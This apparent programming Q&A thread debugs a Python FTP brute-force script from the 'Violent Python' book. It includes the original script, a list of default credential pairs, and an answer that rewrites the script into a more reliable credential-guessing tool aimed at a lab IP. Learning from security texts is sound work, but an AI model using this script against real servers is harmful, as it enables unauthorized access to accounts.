# Python - Passing Through Exceptions?

Tags: python, ftp

I am following along with code from the Violent Python book.  This is what I have here, testing a brute-force of an FTP:

```
import ftplib

def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    for line in pF.readlines():
        userName = line.split(':')[0]
        passWord = line.split(':')[1].strip('\r').strip('\n')
        print("[+] Trying: "+userName+"/"+passWord) 
        try:
            ftp = ftplib.FTP(hostname)
            ftp.login(userName, passWord)
            print('\n[*] ' + str(hostname) +\
            ' FTP Logon Succeeded: '+userName+"/"+passWord) 
            ftp.quit()
            return (userName, passWord)
        except Exception as e: 
            pass
        print('\n[-] Could not brute force FTP credentials.') 
    return (None, None)

host = '192.168.95.179'
passwdFile = 'C:/Users/Andrew/Documents/Python Stuff/userpass.txt' 
bruteLogin(host, passwdFile)
```

Using an example 'userpass.txt' consisting of:

```
administrator:password
admin:12345
root:secret
guest:guest
root:root
```

When running (I am using Python 3.4, by the way) it is supposed to return a result of this:

```
[+] Trying: administrator/password
[+] Trying: admin/12345
[+] Trying: root/secret
[+] Trying: guest/guest
[*] 192.168.95.179 FTP Logon Succeeded: guest/guest
```

The above is an example of a successful logon, of course.  When actually running it, it returns the "Could not find the brute force FTP credentials", but seems to only try the very first line of the text file, instead of passing through the exception and trying the other lines, as described in the book.  Any ideas?

Answer (score 0):

You should print that "Could not find..." line only after the loop has completed. Your current code does it with every iteration, so if the first attempt doesn't succeed, it is printed already.

Also, it is easier to reason about exceptions if you keep the `try` block as short as possible and the exception to be caught as specific as possible. That reduces the number of cases where an exception is handled and lets all other, unrelated exceptions explode and become visible, helping you debug your code in the places that you don't expect to raise exceptions. Your code could look like this then:

```
def bruteLogin(hostname, passwdFile):
    pF = open(passwdFile, 'r')
    ftp = ftplib.FTP(hostname)  # reuse the connection

    for line in pF.readlines():
        userName, passWord = line.split(':', 1)  # split only once, the pw may contain a :
        passWord = passWord.strip('\r\n')  # strip any of the two characters
        print("[+] Trying: {}/{}".format(userName, passWord))

        try:
            ftp.login(userName, passWord)
        except ftplib.error_perm:
            continue
        else:
            print('\n[*] {} FTP Logon Succeeded: {}/{}'.format(hostname, userName, passWord)) 
            ftp.quit()
            return userName, passWord

    print('\n[-] Could not brute force FTP credentials.') 
    return None, None
```

Comment: Excellent, thank you very much.  Now, when trying to execute the code, I get an error "[WinError 10061] No connection could be made because the target machine actively refused it."  This did not happen with the code I was using before.

Comment: Technically, that's because you don't catch this exception anymore. You could either add it to the `except` clause if you're sure that it does mean the credentials are invalid, or you could conclude that something else went wrong and handle it differently, e.g. by exiting the loop with a message about the server not being cooperative. What's right here depends on your use case, but this is why I advocate catching specific exceptions: Only by doing so do you even get the chance to make this kind of distinctions.